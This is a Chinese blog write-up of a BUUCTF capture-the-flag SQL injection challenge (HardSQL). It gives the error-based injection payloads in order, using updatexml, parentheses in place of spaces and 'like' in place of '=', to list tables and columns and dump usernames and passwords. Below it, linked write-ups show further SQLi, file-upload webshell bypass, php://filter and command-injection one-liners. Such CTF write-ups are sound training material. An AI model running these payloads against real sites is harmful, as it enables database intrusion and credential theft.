buuctf-web-[极客大挑战 2019]HardSQL-wp

最新推荐文章于 2023-10-13 07:00:51 发布
最新推荐文章于 2023-10-13 07:00:51 发布
阅读量279 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/119543176
版权
本文详细介绍了如何通过SQL注入技术绕过常见的过滤机制,如过滤关键字and、=、空格和union等,展示了从检查用户名到获取数据库信息、表名、字段名,直至数据dump的全过程。最终利用right()函数成功获取部分数据,并组合成flag。内容涉及SQL注入技巧和数据库信息探测。
摘要由CSDN通过智能技术生成

[极客大挑战 2019]HardSQL

知识点

  • 绕过一些简单的过滤
  • right()

过程

主页是一个登陆页面

过滤了关键字 and、=、空格、union等

查库

check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21

查表

check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=21

查字段

check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=21

dump数据

check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))%23&password=21

不是最终结果,上网搜罗,用right()语句

check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=21

拼接两段即得flag

flag{f1b0debe-86a4-4b3b-a1f0-bf67f3c734d9}

居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-Web-随便注-wp
single7_的博客
12-14 372
0x01 知识点 SQL注入-堆叠注入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种注入方式称为堆叠注入。 union injection(联合注入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语
BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1070
Upload=> 文件上传漏洞。
BUUCTF WEB HardSql
qq_41696858的博客
10-13 249
这题考的是报错注入 判断注入类型还是跟之前一样的,一个单引号’直接看出来是单引号闭合 下面就是注入方式了,之前的双写,堆叠肯定就不用想了,试试报错,emmm 关于报错注入,可以看这一篇,感觉写的还挺详细的,https://developer.aliyun.com/article/692723 基础payload: 账号:a'^extractvalue(1,concat('~',(select(database()))))#,密码123 成功爆破出来库名geek 空格被过滤了,所以需要空格来绕过 知道注入方
BUUCTF WEB [极客挑战 2019]HardSQL
Y1da的博客
04-17 585
BUUCTF WEB [极客挑战 2019]HardSQL 万能密码、union联合注入等关键词and、union等均被过滤,尝试报错注入 爆破库名 1'or(extractvalue(1,concat(1,database())))# XPATH syntax error: 'geek' 爆破表名 1'or(extractvalue(1,concat(1,(select(table_name)from(information_schema.tables)where(table_schema
buuctf web题的wp
qq_51439282的博客
11-25 554
首先看到buuctf里的 [HCTF 2018]WarmUp 可以发现这道题是关于PHP和代码审计的,好家伙我都不会,有得我学了。 打开链接可以看到一张滑稽脸 那不就直接F12,打开查看器 经过我的仔细观察发现没啥可用的东西,到后面开了题解才发现,oh~,原来要查看这个source.php的源代码(其实前面都说了这道题是关于php和代码审计的,我居然没反应过来) 好家伙,就算知道了这个思路,我也不知道怎么查看这个php的源代码,经过一番查找,才发现我们只需要将它复制下来,然后在我们这个web题的链接后面加
BUUCTF web wp
vegetable223的博客
11-28 399
BUUCTF-web warmup wp 首先认真阅读题目,一般题目信息有提示,有些还会有隐藏信息 题目名是“warm up”,热身?,看来没什么用。下面有提示我们这一题的主要知识点是php和代码审计,淦!发现都没学过,不过不要紧,不会我们可以百度啊!!! 打开链接 看到一张滑稽的表情,肯定不简单,直接f12查看源代码 下面展示一些 内联代码片。 <!DOCTYPE html> <html lang="en"> <head> <meta charset=
BUUCTF-Web-[极客挑战 2019]Upload
weixin_67813445的博客
04-29 945
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
BUUCTF-web [极客挑战 2019]PHP1 之 反序列化漏洞
yu_jing_hong的博客
12-02 2909
PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼凑还原数据的过程。 二,PHP中的反序列方法 PHP通过string serialize ( mixed $value )和mixed unserialize ( string $str )两个函数实现序列化和反序列化。 序列化:serialize()将一个对象转换成一个字符串。反序列化:un.
[极客挑战 2019]HardSQL
xj28555的博客
09-02 198
进入题目,一个登录框。 测试了下万能密码登录,无果,有WAF拦截,那接下来就是绕过WAF。 先抓包用bp进行FUZZ,看看有那些没有被拦截的函数。通过手工FUZZ和bpFUZZ结合,发现过滤了and、= 空格 union等多个sql关键字。 发现有一些,报错注入的函数是没有被过滤的,那我们这题就可以通过报错注入来进行注入。 这里我们利用updatexml函数进行报错注入。 payload #查看数据库信息 http://2d43986a-ef4e
[极客挑战 2019]HardSQL1 解题思路
最新发布
xiyuanyue的博客
10-13 247
flag{d23142e7-2546-47c3-b238-de只返回一部分flag是因为updatexml 函数返回错误信息长度是112个字符,所以要对password 截取一部分,可以通过,substr left right函数做处理 ,substr函数已经禁止,就用right函数。2、尝试联合注入、时间盲注 发现 and union /**/ /*!2、关键字替换(空格替换,单引号替换,等号替换);3、通过错误函数updatexml 获取数据库、表、字段。3、错误函数、时间盲注、条件盲注。
buuctf web wp
qq_63267612的博客
04-10 518
文章目录[极客挑战 2019]EasySQL [极客挑战 2019]EasySQL 打开后是一个登录框,直接尝试万能密码 (用户名:1’ or 1=1 # 密码:随便输) 登录得到flag 这里的万能密码是为什么呢? 数据库中的查询语句: select id from users where username = '' or 1=1-- and password = '456' 又 这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳
buuctf部分题目wp
goddemon
10-23 557
EasySQL ①测试返回的页面状况特点类 发觉存在三种页面–>即返回为no的即为过滤掉的 ②测试了下发觉show,select,;语句没有被过滤 from类语句被过滤掉了 即可以考虑是否是堆叠注入 测试了几个 1;select database(); 1;show databases; 1;show tables; 找到了名字为Flag的表 尝试直接利用*直接注入返回出 发觉也没有办法返回出 无奈查大佬们的wp 发觉后台的查询语句可能是这样的,即*|跟其代用时,会直接被注释掉 sql =
BUUCTF web第一页WP
东隅的博客
05-13 764
目录 [极客挑战 2019]EasySQL [HCTF 2018]WarmUp [极客挑战 2019]Havefun [ACTF2020 新生赛]Include [强网杯 2019]随便注 [极客挑战 2019]EasySQL payload: 1' or 1=1-- - 1 flag{deb9ccf8-479a-49c9-8412-6171f1c4b057} [HCTF 2018]WarmUp f12查看源码发现提示source.php, 进入获得源代码 .
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 4750
BUUCTF--Web篇详细wp
文件上传之黑名单验证绕过
weixin_34187822的博客
09-15 684
当做代码的审计或者文件搞渗文章上传的时候有时候会遇到黑名单的验证码,比如常规的一些脚本名asp php jsp这种的不允许上传,下面是我总结的一些绕过的方法Shtml<!--#includefile="/home/www/user8534/nav_foot.htm"--> //可以用来读文件<!--#exec cmd="ifconfig"--> //可...
buuctf-web-[ACTF2020 新生赛]Exec-wp
居上
06-25 189
[ACTF2020 新生赛]Exec 知识点 命令执行 过程 主页面: 这里是存在命令执行漏洞的,我们尝试去使用;执行命令 127.0.0.1;cat /flag
buuctf-web-[ACTF2020 新生赛]Include-wp
居上
06-22 178
[ACTF2020 新生赛]Include 知识点 php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。 过程 主页: 有个get型的参数,可以看到传入flag.php,这里是一个文件包含,但是无法查看php脚本的详细内容 payload ?file=php://filter/read=convert.base64-encode/resource=flag.php .
buuctf-web-[ACTF2020 新生赛]BackupFile-wp
居上
07-17 227
[ACTF2020 新生赛]BackupFile 知识点 备份文件泄露 php中的弱类型比较 过程 使用扫描软件扫一下目录,扫到/index.php.bak <?php include_once "flag.php"; if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);
buuctf-web-[极客挑战 2019]Upload-wp
居上
07-12 228
[极客挑战 2019]Upload 知识点 上传phtml文件 嵌在script标签中的一句话木马 content-type的修改 请求体中的添加文件头 过程 主页就是上传点,先上传一个正常的shell.php文件 发现只能上传image,bp抓包依次尝试文件后缀名修改,content-type修改、文件名%00截断,添加文件头都失败 然后更改文件名为xx.phtml,,phtml是嵌入了php代码的html文件,尝试上传,请求体中的内容仍然是普通的一句话木马文件 检测到<?请求体中的内
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值